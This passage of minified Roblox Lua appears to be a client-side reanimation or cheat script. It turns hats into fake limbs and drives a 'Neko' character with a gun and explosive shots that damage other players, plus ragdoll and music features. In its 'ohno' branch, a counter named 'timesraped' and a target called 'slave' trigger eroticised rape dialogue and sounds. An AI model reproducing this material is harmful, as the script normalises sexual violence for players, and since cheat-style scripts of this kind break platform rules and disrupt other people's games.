Arm"]cocksound.Parent=Gun;cocksound:Play()end;RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.499996185,0.500000954,-0.299999237,0.573117733,0.450334728,0.684641957,-0.810699165,0.189650699,0.553894997,0.119595334,-0.872485697,0.473778099),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,0,0.0871557593,-0.99619472,0,0.99619472,0.0871557593,1,0,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.836516201,0.247167766,0.489028335,0.224143848,-0.660038292,0.717013896,0.500000179,0.709406495,0.496731579),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)elseif T>=30 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.399996191,0.500000954,-0.0999992415,0.390131444,-0.530427456,0.752624869,-0.810699165,0.189650699,0.553894997,-0.436536878,-0.826244116,-0.356028348),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,0,0.0871557593,-0.99619472,0,0.99619472,0.0871557593,1,0,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.859785378,0.00365444645,0.51064235,0.365998089,-0.692931056,0.621201932,0.356110126,0.720994592,0.59443444),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)end end end;GunWeld.Part1=Character["Right Arm"]GunWeld.Part0=Gun;GunWeld.C0=CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1)GunWeld.C1=CFrame.new(0.00025177002,-1.30018997,4.76837158e-05,1.00000012,-4.7326088e-05,8.3854422e-05,-8.38935375e-05,9.13441181e-06,1,-4.73186374e-05,-1,9.13441181e-06)FlashlightClick.PlaybackSpeed=1.1;FlashlightClick:Play()GunLaser1.Transparency=0.6;GunLaser2.Transparency=0.8;GunLaser3.Transparency=0.95;action=false;walking=false;running=false;GunEquipped=true;Character.Humanoid.WalkSpeed=10;GunIdleAnimation()Character.Humanoid.JumpPower=jumppower else action=true;GunEquipped=false;running=false;shiftdown=false;FlashlightClick.PlaybackSpeed=0.9;FlashlightClick:Play()GunLaser1.Transparency=1;GunLaser2.Transparency=1;GunLaser3.Transparency=1;Character.Humanoid.JumpPower=0;for T=1,15 do wait()if T==1 then masksound:Play()elseif T==14 then equipsound:Play()end;TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.866025448,0.499999762,0,-0.499999762,0.866025448),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.5,0.500000119,0,-0.0885213241,-0.411008537,0.907323539,0.243210346,0.874410391,0.41982758,-0.965925813,0.257834166,0.0225575641),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,-0.00644042995,0.0771135688,-0.997001529,0.036346633,0.996381342,0.0768309459,0.999318421,-0.035742797,-0.00922000408),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.817427635,0.574380577,0.0435779542,-0.306258202,-0.49742949,0.811646461,0.487870991,0.650116205,0.582521319),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)end;Gun.Parent=nil;action=false;walking=false;running=false;shiftdown=false;wait()Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower;IdleAnimation()end end;function GunFire(lM)if action==true then return else action=true;shooting=true;lerpintensity=0.7 end;Character.Humanoid.JumpPower=0;for T=1,5 do wait()TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.866025448,0.499999762,0,-0.499999762,0.866025448),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.200000018,1.10000014,0,-1.94808241e-08,-1.49011603e-08,0.99999994,-1,1.87256603e-07,-2.00234354e-08,-1.78955474e-07,-1.00000012,8.75252168e-16),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,1.10000026,0,0.819151998,-3.58062735e-08,-0.573576331,0.573576391,-2.50718202e-08,0.819151938,-4.37113883e-08,-1,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.0871559083,0.99619472,0,0.99619472,-0.0871559083),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)end;local lN=Ray.new(Gun.CFrame.p,(lM-Gun.CFrame.p).unit*500)if not game:GetService("Workspace"):FindFirstChild("ShotFolder")then local lO=Instance.new("Folder")lO.Name="ShotFolder"lO.Parent=game:GetService("Workspace");RemoteEvent:FireClient(Playerr,"folderexists")end;for T,v in pairs(game:GetService("Workspace").ShotFolder:GetChildren())do table.insert(gunraycastignorelist,1,v)end;for T,v in pairs(game:GetService("Workspace"):GetDescendants())do if v.ClassName=="Accessory"then table.insert(gunraycastignorelist,1,v)end end;local ec,lP=workspace:FindPartOnRayWithIgnoreList(lN,gunraycastignorelist)local lQ=Instance.new("Part")local lR=(Gun.Position-lP).magnitude;if ec then if ec.Parent:FindFirstChildOfClass("Humanoid")~=nil then if ec.Name=="Head"then if ec.Parent:FindFirstChildOfClass("Humanoid").Health-headshotdamage<=0 and ec.Parent:FindFirstChildOfClass("Humanoid"):GetState()~=Enum.HumanoidStateType.Dead then if shoutplaying==true then return else local lJ=math.random(1,3)if lJ==1 then Character.Head.Kill1:Play()Character.Head.Kill1.Ended:Connect(function()shoutplaying=false end)elseif lJ==2 then Character.Head.Kill2:Play()Character.Head.Kill2.Ended:Connect(function()shoutplaying=false end)elseif lJ==3 then Character.Head.Kill3:Play()Character.Head.Kill3.Ended:Connect(function()shoutplaying=false end)end end end;if headshotdamage<=ec.Parent:FindFirstChildOfClass("Humanoid").Health/40 then Useless:Clone().Parent=ec;ec.Useless.PlaybackSpeed=math.random(9,12)/10;ec.Useless:Remove()else ShotMarker:Clone().Parent=ec;ec.ShotMarker.PlaybackSpeed=1.4;ec.ShotMarker:Remove()end;ec.Parent:FindFirstChildOfClass("Humanoid"):TakeDamage(headshotdamage)else if ec.Parent:FindFirstChildOfClass("Humanoid").Health-gunshotdamage<=0 and ec.Parent:FindFirstChildOfClass("Humanoid"):GetState()~=Enum.HumanoidStateType.Dead then if shoutplaying==true then return else local lJ=math.random(1,3)if lJ==1 then Character.Head.Kill1:Play()Character.Head.Kill1.Ended:Connect(function()shoutplaying=false end)elseif lJ==2 then Character.Head.Kill2:Play()Character.Head.Kill2.Ended:Connect(function()shoutplaying=false end)elseif lJ==3 then Character.Head.Kill3:Play()Character.Head.Kill3.Ended:Connect(function()shoutplaying=false end)end end end;if gunshotdamage<=ec.Parent:FindFirstChildOfClass("Humanoid").Health/60 then Useless:Clone().Parent=ec;ec.Useless.PlaybackSpeed=math.random(9,12)/10;ec.Useless:Remove()else ShotMarker:Clone().Parent=ec;ec.ShotMarker.PlaybackSpeed=1;ec.ShotMarker:Remove()end;ec.Parent:FindFirstChildOfClass("Humanoid"):TakeDamage(gunshotdamage)end end end;lQ.Transparency=0.4;lQ.CanCollide=false;if ec then lQ.Size=Vector3.new(0.3,0.3,lR)else lQ.Size=Vector3.new(0.3,0.3,500)end;lQ.Material="Neon"lQ.CFrame=Gun.CFrame:Lerp(CFrame.new(lP),0.5)lQ.CFrame=CFrame.new(lQ.Position,lP)lQ.Anchored=true;lQ.Name="PlayerGunFire"lQ.Parent=game:GetService("Workspace").ShotFolder;local lS={}lS.Transparency=1;lS.Size=lQ.Size+Vector3.new(1,1,0)local lT=TweenInfo.new(0.3,Enum.EasingStyle.Linear)local lU=TweenService:Create(lQ,lT,lS)lU:Play()lU.Completed:Connect(function()lQ:Destroy()end)local lJ=possibleshotnoise[math.random(1,#possibleshotnoise)]if lJ==possibleshotnoise[1]then if not Gun:FindFirstChild("first")then local lV=Instance.new("Sound")lV.Name="first"lV.Volume=4;lV.SoundId=possibleshotnoise[1]lV.Parent=Gun end;Gun.first.Pitch=math.random(8,12)/10;Gun.first:Play()elseif lJ==possibleshotnoise[2]then if not Gun:FindFirstChild("second")then local lV=Instance.new("Sound")lV.Name="second"lV.Volume=4;lV.SoundId=possibleshotnoise[2]lV.Parent=Gun end;Gun.second.Pitch=math.random(8,12)/10;Gun.second:Play()elseif lJ==possibleshotnoise[3]then if not Gun:FindFirstChild("third")then local lV=Instance.new("Sound")lV.Name="third"lV.Volume=4;lV.SoundId=possibleshotnoise[3]lV.Parent=Gun end;Gun.third.Pitch=math.random(8,12)/10;Gun.third:Play()elseif lJ==possibleshotnoise[4]then if not Gun:FindFirstChild("fourth")then local lV=Instance.new("Sound")lV.Name="fourth"lV.Volume=4;lV.SoundId=possibleshotnoise[4]lV.Parent=Gun end;Gun.fourth.Pitch=math.random(8,12)/10;Gun.fourth:Play()elseif lJ==possibleshotnoise[5]then if not Gun:FindFirstChild("fifth")then local lV=Instance.new("Sound")lV.Name="fifth"lV.Volume=4;lV.SoundId=possibleshotnoise[5]lV.Parent=Gun end;Gun.fifth.Pitch=math.random(8,12)/10;Gun.fifth:Play()end;action=false;if walking==true then if running==true then GunRunAnimation()else GunWalkAnimation()end else GunIdleAnimation()end;shooting=false;Character.Humanoid.JumpPower=jumppower;gunraycastignorelist={Gun,Character}end;function GunExplosionFire(lM)local lW=coroutine.wrap(function(lX)repeat wait(0.1)lX=lX-0.1 until lX<=0;shotavailable=true end)if action==true then return else action=true end;Character.Humanoid.JumpPower=0;lerpintensity=0.7;shooting=true;shotavailable=false;for T=1,5 do wait()TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.866025448,0.499999762,0,-0.499999762,0.866025448),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.200000018,1.10000014,0,-1.94808241e-08,-1.49011603e-08,0.99999994,-1,1.87256603e-07,-2.00234354e-08,-1.78955474e-07,-1.00000012,8.75252168e-16),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,1.10000026,0,0.819151998,-3.58062735e-08,-0.573576331,0.573576391,-2.50718202e-08,0.819151938,-4.37113883e-08,-1,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.0871559083,0.99619472,0,0.99619472,-0.0871559083),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)end;local lN=Ray.new(Gun.CFrame.p,(lM-Gun.CFrame.p).unit*500)if not game:GetService("Workspace"):FindFirstChild("ShotFolder")then local lO=Instance.new("Folder")lO.Name="ShotFolder"lO.Parent=game:GetService("Workspace");RemoteEvent:FireClient(Playerr,"folderexists")end;for T,v in pairs(game:GetService("Workspace").ShotFolder:GetChildren())do if v.Name=="PlayerGunFire"then table.insert(gunraycastignorelist,1,v)end end;local ec,lP=workspace:FindPartOnRayWithIgnoreList(lN,gunraycastignorelist)local lQ=Instance.new("Part")lQ.Color=Orange;local lR=(Gun.Position-lP).magnitude;lQ.Transparency=0.4;lQ.CanCollide=false;if ec then lQ.Size=Vector3.new(0.3,0.3,lR)else lQ.Size=Vector3.new(0.3,0.3,500)end;lQ.Material="Neon"lQ.CFrame=Gun.CFrame:Lerp(CFrame.new(lP),0.5)lQ.CFrame=CFrame.new(lQ.Position,lP)lQ.Anchored=true;lQ.Name="PlayerGunFire"local lY=lQ:Clone()lY.Size=lQ.Size+Vector3.new(0.7,0.7,0)lY.Name="PlayerGunFire"lQ.Parent=game:GetService("Workspace").ShotFolder;lY.Parent=game:GetService("Workspace").ShotFolder;local lS={}lS.Transparency=1;lS.CFrame=lQ.CFrame;lS.Size=lQ.Size+Vector3.new(lQ.Size.X+1,lQ.Size.Y+1,0)local lT=TweenInfo.new(0.3,Enum.EasingStyle.Linear)local lU=TweenService:Create(lQ,lT,lS)lU:Play()lU=TweenService:Create(lY,lT,lS)lU:Play()lU.Completed:Connect(function()lQ:Destroy()lY:Destroy()end)local lZ=Explosion1:Clone()local l_=Explosion2:Clone()lS.Size=Vector3.new(lZ.Size.X+1,lZ.Size.Y+1,lZ.Size.Z+1)lS.CFrame=CFrame.new(lP)lZ.CFrame=CFrame.new(lP)lZ.Parent=game:GetService("Workspace");lU=TweenService:Create(lZ,lT,lS)lU:Play()l_.CFrame=CFrame.new(lP)l_.Parent=game:GetService("Workspace");explosionsound:Clone().Parent=l_;l_.Sound:Remove()lU=TweenService:Create(l_,lT,lS)lU:Play()lU.Completed:Connect(function()lZ:Destroy()l_:Destroy()wait()end)local m0=Instance.new("Explosion")m0.BlastPressure=500000;m0.BlastRadius=18;m0.DestroyJointRadiusPercent=0;m0.ExplosionType=Enum.ExplosionType.NoCraters;m0.Visible=false;m0.Position=lZ.Position;m0.Parent=game:GetService("Workspace");lZ.Touched:Connect(function(hit)if hit.Parent:FindFirstChildOfClass("Humanoid")~=nil then if hit.Parent:FindFirstChildOfClass("Humanoid"):FindFirstChild("Hit")then return end;if hit.Parent:FindFirstChildOfClass("Humanoid")~=nil then if hit.Parent:FindFirstChildOfClass("Humanoid").Health-explosionshotdamage<=0 and hit.Parent:FindFirstChildOfClass("Humanoid"):GetState()~=Enum.HumanoidStateType.Dead then if shoutplaying==true then return else local lJ=math.random(1,3)if lJ==1 then Character.Head.Kill1:Play()Character.Head.Kill1.Ended:Connect(function()shoutplaying=false end)elseif lJ==2 then Character.Head.Kill2:Play()Character.Head.Kill2.Ended:Connect(function()shoutplaying=false end)elseif lJ==3 then Character.Head.Kill3:Play()Character.Head.Kill3.Ended:Connect(function()shoutplaying=false end)end end end;if explosionshotdamage<=hit.Parent:FindFirstChildOfClass("Humanoid").Health/20 then Useless:Clone().Parent=hit;hit.Useless.PlaybackSpeed=math.random(9,12)/10;hit.Useless:Remove()end;local m1=Instance.new("NumberValue")m1.Name="Hit"m1.Parent=hit.Parent:FindFirstChildOfClass("Humanoid")hit.Parent:FindFirstChildOfClass("Humanoid"):TakeDamage(explosionshotdamage)end end end)local lJ=possibleshotnoise[math.random(1,#possibleshotnoise)]if lJ==possibleshotnoise[1]then if not Gun:FindFirstChild("first")then local lV=Instance.new("Sound")lV.Name="first"lV.Volume=4;lV.Parent=Gun end;Gun.first.Pitch=math.random(8,12)/10;Gun.first:Play()elseif lJ==possibleshotnoise[2]then if not Gun:FindFirstChild("second")then local lV=Instance.new("Sound")lV.Name="second"lV.Volume=4;lV.Parent=Gun end;Gun.second.Pitch=math.random(8,12)/10;Gun.second:Play()elseif lJ==possibleshotnoise[3]then if not Gun:FindFirstChild("third")then local lV=Instance.new("Sound")lV.Name="third"lV.Volume=4;lV.Parent=Gun end;Gun.third.Pitch=math.random(8,12)/10;Gun.third:Play()elseif lJ==possibleshotnoise[4]then if not Gun:FindFirstChild("fourth")then local lV=Instance.new("Sound")lV.Name="fourth"lV.Volume=4;lV.Parent=Gun end;Gun.fourth.Pitch=math.random(8,12)/10;Gun.fourth:Play()elseif lJ==possibleshotnoise[5]then if not Gun:FindFirstChild("fifth")then local lV=Instance.new("Sound")lV.Name="fifth"lV.Volume=4;lV.Parent=Gun end;Gun.fifth.Pitch=math.random(8,12)/10;Gun.fifth:Play()end;action=false;lW(2)if walking==true then if running==true then GunRunAnimation()else GunWalkAnimation()end else GunIdleAnimation()end;lerpintensity=0.2;gunraycastignorelist={Gun,Character}shooting=false;Character.Humanoid.JumpPower=jumppower;wait()for T,v in pairs(game:GetService("Workspace"):GetDescendants())do if v.ClassName=="NumberValue"and v.Name=="Hit"then v:Destroy()end end end;function Ragdoll()Character.Humanoid.AutoRotate=false;local m2=0;local m3=0;local m4=0;m2=math.random(1,2)m3=math.random(1,2)m4=math.random(1,2)if m2==1 then m2=-10 else m2=10 end;if m3==1 then m3=-10 else m3=10 end;if m4==1 then m4=-10 else m3=10 end;Character.Torso.RotVelocity=Vector3.new(Character.Torso.RotVelocity.X+m2,Character.Torso.RotVelocity.Y+m3,Character.Torso.RotVelocity.Z+m4)local m5=Instance.new("Attachment")m5.Position=Vector3.new(0.5,1,-0)m5.Name="LeftCollarAttachment"local m6=Instance.new("Attachment")m6.Position=Vector3.new(-0.5,1,-0)m6.Name="RightCollarAttachment"local m7=Instance.new("Attachment")m7.Position=Vector3.new(0.1,1,-0)m7.Name="LeftHipAttachment"local m8=Instance.new("Attachment")m8.Position=Vector3.new(-0.4,-1,0)m8.Name="LeftHipAttachmentOrig"local m9=Instance.new("Attachment")m9.Position=Vector3.new(-0.1,1,0)m9.Name="RightHipAttachment"local ma=Instance.new("Attachment")ma.Position=Vector3.new(0.4,-1,0)ma.Name="RightHipAttachmentOrig"local mb=Instance.new("Attachment")mb.Position=Vector3.new(0,-0.5,0)mb.Name="NeckAttachment"local mc=Instance.new("BallSocketConstraint")mc.TwistLimitsEnabled=false;mc.Name="LeftArmdoll"local md=Instance.new("BallSocketConstraint")md.TwistLimitsEnabled=false;md.Name="RightArmdoll"local mf=Instance.new("BallSocketConstraint")mf.TwistLimitsEnabled=false;mf.Name="LeftLegdoll"local mg=Instance.new("BallSocketConstraint")mg.TwistLimitsEnabled=false;mg.Name="RightLegdoll"local mh=Instance.new("BallSocketConstraint")mh.TwistLimitsEnabled=false;mh.Name="Neckdoll"m5:Clone().Parent=Character["Left Arm"]m6:Clone().Parent=Character["Right Arm"]m7:Clone().Parent=Character["Left Leg"]m8:Clone().Parent=Character.Torso;m9:Clone().Parent=Character["Right Leg"]ma:Clone().Parent=Character.Torso;mb:Clone().Parent=Character["Head"]mc:Clone().Parent=Character.Torso;md:Clone().Parent=Character.Torso;mf:Clone().Parent=Character.Torso;mg:Clone().Parent=Character.Torso;mh:Clone().Parent=Character.Torso;Character.Torso.LeftArmdoll.Attachment0=Character.Torso.LeftCollarAttachment;Character.Torso.LeftArmdoll.Attachment1=Character["Left Arm"].LeftCollarAttachment;Character.Torso.RightArmdoll.Attachment0=Character.Torso.RightCollarAttachment;Character.Torso.RightArmdoll.Attachment1=Character["Right Arm"].RightCollarAttachment;Character.Torso.LeftLegdoll.Attachment0=Character.Torso.LeftHipAttachmentOrig;Character.Torso.LeftLegdoll.Attachment1=Character["Left Leg"].LeftHipAttachment;Character.Torso.RightLegdoll.Attachment0=Character.Torso.RightHipAttachmentOrig;Character.Torso.RightLegdoll.Attachment1=Character["Right Leg"].RightHipAttachment;Character.Torso.Neckdoll.Attachment0=Character.Torso.NeckAttachment;Character.Torso.Neckdoll.Attachment1=Character.Head.NeckAttachment;for T,v in pairs(Character:GetChildren())do if v:IsA("BasePart")then if v.Name=="Right Arm"or v.Name=="Left Arm"then v.CustomPhysicalProperties=PhysicalProperties.new(0.1,0,0,0,0)local mi=Instance.new("Part")mi.Size=Vector3.new(1,2,1)mi.Transparency=1;mi.Parent=v;local weld=Instance.new("ManualWeld")weld.Parent=script.Parent;weld.Part0=mi;weld.Part1=v;weld.C0=CFrame.new(0,0,0)weld.C1=CFrame.new(0,0,0)PhysicsService:SetPartCollisionGroup(mi,"TopLimbs")elseif v.Name=="Left Leg"or v.Name=="Right Leg"then v.CustomPhysicalProperties=PhysicalProperties.new(0.1,0,0,0,0)local mi=Instance.new("Part")mi.Size=Vector3.new(1,2,1)mi.Transparency=1;mi.Parent=v;local weld=Instance.new("ManualWeld")weld.Parent=script.Parent;weld.Part0=mi;weld.Part1=v;weld.C0=CFrame.new(0,0,0)weld.C1=CFrame.new(0,0,0)PhysicsService:SetPartCollisionGroup(mi,"BottomLimbs")elseif v.Name=="Torso"or v.Name=="Head"then if v.Size==Vector3.new(2,1,1)then v.CustomPhysicalProperties=PhysicalProperties.new(0.1,0,0,0,0)local mj=Instance.new("Part")mj.Size=Vector3.new(2,1,1)mj.Transparency=1;mj.Parent=v;local weld=Instance.new("ManualWeld")weld.Parent=script.Parent;weld.Part0=mj;weld.Part1=v;weld.C0=CFrame.new(0,0,0)weld.C1=CFrame.new(0,0,0)else local mk=Instance.new("Part")mk.Size=Vector3.new(2,2,1)mk.Transparency=1;mk.Parent=v;local weld=Instance.new("ManualWeld")weld.Parent=script.Parent;weld.Part0=mk;weld.Part1=v;weld.C0=CFrame.new(0,0,0)weld.C1=CFrame.new(0,0,0)end;PhysicsService:SetPartCollisionGroup(v,"BignSmallLimbs")end end end;for T,v in pairs(Character:GetDescendants())do if v.ClassName=="Motor6D"then v:Remove()end end end;coroutine.resume(coroutine.create(function()game:GetService("Players").LocalPlayer.Character=M.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;function dieded()M.Trash.Humanoid.Health=0;M.Humanoid.Health=0 end;M.Humanoid.Died:Connect(dieded)M.Trash.Humanoid.Died:Connect(dieded)end))function SelfTerminate()while wait()do if Character==nil then wait(1)script:Destroy()end end end;function Talk(ml)local mm=ml;if Character.Torso:FindFirstChild("BillboardGui")~=nil then Character.Torso.BillboardGui:Destroy()elseif Character.Torso:FindFirstChild("SecondBoard")~=nil then Character.Torso.SecondBoard:Destroy()end;Character.Head.Mouth.Texture="rbxassetid://2818152743"local gF=Instance.new("BillboardGui")gF.Parent=Character.Torso;gF.StudsOffset=Vector3.new(0,4,0)gF.Size=UDim2.new(1,0,1,0)local gC=Instance.new("TextLabel")gC.Text=""gC.Size=UDim2.new(1,0,1,0)gC.BackgroundTransparency=1;gC.Parent=gF;gC.TextSize=16;gC.TextColor3=Color3.new(1,1,1)gC.TextStrokeTransparency=0;gC.TextStrokeColor3=Color3.new(0.4,0.4,0.4)gC.Text=mm;wait(1)Character.Head.Mouth.Texture="rbxassetid://2801594973"local lJ=math.random(1,2)local lS={}lS.TextTransparency=1;lS.TextStrokeTransparency=1;if lJ==1 then lS.Rotation=-45 else lS.Rotation=45 end;local TweenInfo=TweenInfo.new(1,Enum.EasingStyle.Quad,Enum.EasingDirection.In)local lG=TweenService:Create(gC,TweenInfo,lS)lG:Play()lG.Completed:Connect(function()if gF then gF:Destroy()end end)lS.TextTransparency=nil;lS.TextStrokeTransparency=nil;lS.Rotation=nil;lG=TweenService:Create(gF,TweenInfo,lS)lG:Play()end;Character.Humanoid.Running:Connect(function(mn)if mn>0.1 then if action==true or walking==true then return end;if GunEquipped==true then walking=true;GunWalkAnimation()else walking=true;WalkAnimation()end elseif mn<=0.1 then if action==true or walking==false then return end;if GunEquipped==true then walking=false;GunIdleAnimation()else walking=false;IdleAnimation()end end end)Character.Humanoid.StateChanged:Connect(function(mo,new)if freefall==true and Character.Humanoid:GetState()~=Enum.HumanoidStateType.Freefall then freefall=false end;if Character.Humanoid:GetState()==Enum.HumanoidStateType.Dead then Ragdoll()if Gun.Parent~=nil and Gun:FindFirstChildOfClass("ManualWeld")then Gun.ManualWeld:Destroy()end;wait(0.1)script:Destroy()elseif Character.Humanoid:GetState()==Enum.HumanoidStateType.Freefall then freefall=true;FallingAnimation()end end)function stoprunning()if GunEquipped==false then return end;shiftdown=false;running=false;Character.Humanoid.WalkSpeed=10;if walking==true then GunWalkAnimation()else GunIdleAnimation()end end;if contact=="gunhold"then if GunEquipped==true then return end;if action==true then if grabbed==true then if on=="true"then on="more"return elseif on=="more"then on="owo"end end;return end;on="true"Groom()elseif contact=="gunfire"then if GunEquipped==true then GunFire(contact2)end elseif contact=="explosionfire"then if GunEquipped==true and shotavailable==true then GunExplosionFire(contact2)end elseif contact=="startrunning"then if action==true then return end;if walking==true then shiftdown=true;Character.Humanoid.WalkSpeed=50;GunRunAnimation()end elseif contact=="stoprunning"then shiftdown=false;if action==true or running==false then return end;stoprunning()elseif contact=="musicswitch"then if music==false then local h=math.random(1,4)if h==1 then YoshisIsland.SoundId="rbxassetid://916843842"YoshisIsland.Volume=10;YoshisIsland.Pitch=3;YoshisIsland:Play()elseif h==2 then YoshisIsland.SoundId="rbxassetid://1687028388"YoshisIsland.Volume=10;YoshisIsland.Pitch=1;YoshisIsland:Play()elseif h==3 then YoshisIsland.SoundId="rbxassetid://277251227"YoshisIsland.Volume=10;YoshisIsland.Pitch=1;YoshisIsland:Play()elseif h==4 then YoshisIsland.SoundId="rbxassetid://843141049"YoshisIsland.Volume=10;YoshisIsland.Pitch=1;YoshisIsland:Play()end;music=true else YoshisIsland:Stop()music=false end elseif contact=="tacklehug"then if GunEquipped==true then return end;if action==true then if grabbed==true then if on=="true"then on="more"return end end;return end;on="true"Tackle()SoftTackle()elseif contact=="stoptacklehug"then if GunEquipped==true then return end;on="false"elseif contact=="ohno"then if grabbed==true then if GunEquipped==true then return end;if timesraped<1 then Talk("this is my first time "..slave.Name..", Please be gentle!~")else Talk("this isnt my first time "..slave.Name.." you know? but it still feels good~")end;wait(1)local mp=Instance.new("Sound",Character.Torso)local mq=Instance.new("Sound",Character.Torso)local ms=Instance.new("Sound",Character.Torso)local mt=Instance.new("Sound",Character.Torso)mp.Volume=3;mq.Volume=3;ms.Volume=3;mt.Volume=5;mp.SoundId="rbxassetid://"..lt[1]mq.SoundId="rbxassetid://"..lt[2]ms.SoundId="rbxassetid://"..lt[3]mt.SoundId="rbxassetid://"..lt[4]Character.Head.Eyes.Texture="rbxassetid://2818165600"Character.Head.Mouth.Texture="rbxassetid://2801778896"mp:Play()mq:Play()ms:Play()mt:Play()wait(0.61+0.25)mp:Destroy()mq:Destroy()ms:Destroy()mt:Destroy()Character.Head.Eyes.Texture="rbxassetid://3656713670"Character.Head.Mouth.Texture="rbxassetid://2801594973"aro=true;timesraped=timesraped+1 end end;spawn(SelfTerminate)wait()IdleAnimation()Talk(Character.Name.." The Neko")while wait()do if aro==true then Character.Head.Blush.Texture="rbxassetid://3523974768"break else end end end;function Clickey9()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local L=game:GetService("Players").LocalPlayer.Name;Character["Bang w bun"].Name="Bang w bun"Character["Bang w bun"].Name="Bang w bun1"Character["Bang w bun"].Name="Bang w bun2"local R={rightarm=Character:WaitForChild("Bang w bun"),leftarm=Character:WaitForChild("Bang w bun1"),rightleg=Character:WaitForChild("Bang w bun2"),leftleg=Character:WaitForChild("BoyAnimeHair"),torso=Character:WaitForChild("Cyber Peacock Tail 2.0"),head=Character:WaitForChild("AnimeShortHairAccessory9")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=50000;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=50000;Y.Orientation=Vector3.new(90,0,0)end;coroutine.resume(coroutine.create(function()Playa=game:GetService("Players").LocalPlayer;dead=false;crackers=Playa.Character;pew=crackers["InternationalFedora"]pewhandle=pew.Handle;pewhandle.SpecialMesh:Destroy()pew.Handle.Transparency=1;outline=Instance.new("SelectionBox")outline.Parent=pewhandle;outline.Adornee=pewhandle;outline.LineThickness=0.1;outline.Color=BrickColor.new("Really red")wait()pew.Parent=workspace;mouse=Playa:GetMouse()head=crackers.Head;camera=workspace.CurrentCamera;brug=true;reloady=false;brumom=false;bbv=Instance.new("BodyVelocity",pewhandle)mouse.Button1Down:Connect(function()if dead==false then 